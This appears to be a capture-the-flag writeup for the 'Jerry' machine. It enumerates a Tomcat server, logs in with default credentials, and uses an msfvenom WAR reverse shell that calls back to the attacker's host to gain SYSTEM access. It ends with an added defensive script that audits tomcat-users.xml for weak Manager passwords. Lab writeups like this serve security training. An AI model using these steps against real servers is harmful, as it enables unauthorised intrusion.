Ping

Nmap Scans
mapit 10.10.10.95
Nmap Default Scan

Nmap Script and Service Scan

Nmap All port Scan

On port 8080

Gobuster Scan
gobuster dir -u http://10.10.10.95:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,aspx -s 200,204,301,302,307,403 -k --status-codes-blacklist "" -o gobuster.txt

On http://10.10.10.95:8080/manager/
It prompts for a password; found the default credentials for the Tomcat server: tomcat:s3cr3t
From the HackTricks page about Tomcat enumeration: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat

WAR file upload field

Generate a WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.9 LPORT=443 -f war -o shell.war

Upload and deploy it
The shell application now shows up in the list; set up a Netcat listener first, then click it
Got a reverse shell
We are NT AUTHORITY, so no privilege escalation is needed
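
A defender-side check for the misconfiguration used above, as an added example that is not part of the original writeup: it audits a tomcat-users.xml for accounts that hold Manager roles with a default or weak password. The sample files, the weak-password list (apart from s3cr3t) and the function name are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Tomcat roles that grant access to the Manager and Host Manager applications.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}
# Constructed short list for illustration; "s3cr3t" is the value from this writeup.
WEAK_PASSWORDS = {"", "s3cr3t", "tomcat", "admin", "password", "changeit"}

# Constructed sample: the kind of entry that allowed the login above.
WEAK_SAMPLE = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cr3t" roles="manager-gui"/>
  <user username="viewer" password="viewer" roles="reports"/>
</tomcat-users>"""

# Constructed sample: one deployment account with a unique, non-default password.
HARDENED_SAMPLE = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <user username="deployer" password="CONSTRUCTED-unique-value-0f3a9c7e"
        roles="manager-script"/>
</tomcat-users>"""

def audit_tomcat_users(xml_text):
    """Return (username, manager_roles, reason) for each risky account."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        # Drop the XML namespace so namespaced and plain files both match.
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",")}
        risky = sorted(roles & MANAGER_ROLES)
        if not risky:
            continue  # account holds no Manager role, out of scope here
        if password.lower() in WEAK_PASSWORDS:
            findings.append((name, risky, "default or weak password"))
        elif password.lower() == name.lower():
            findings.append((name, risky, "password equals username"))
    return findings

if __name__ == "__main__":
    for label, sample in (("weak", WEAK_SAMPLE), ("hardened", HARDENED_SAMPLE)):
        print(label, audit_tomcat_users(sample))
```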
Flags

Done with Jerry…:)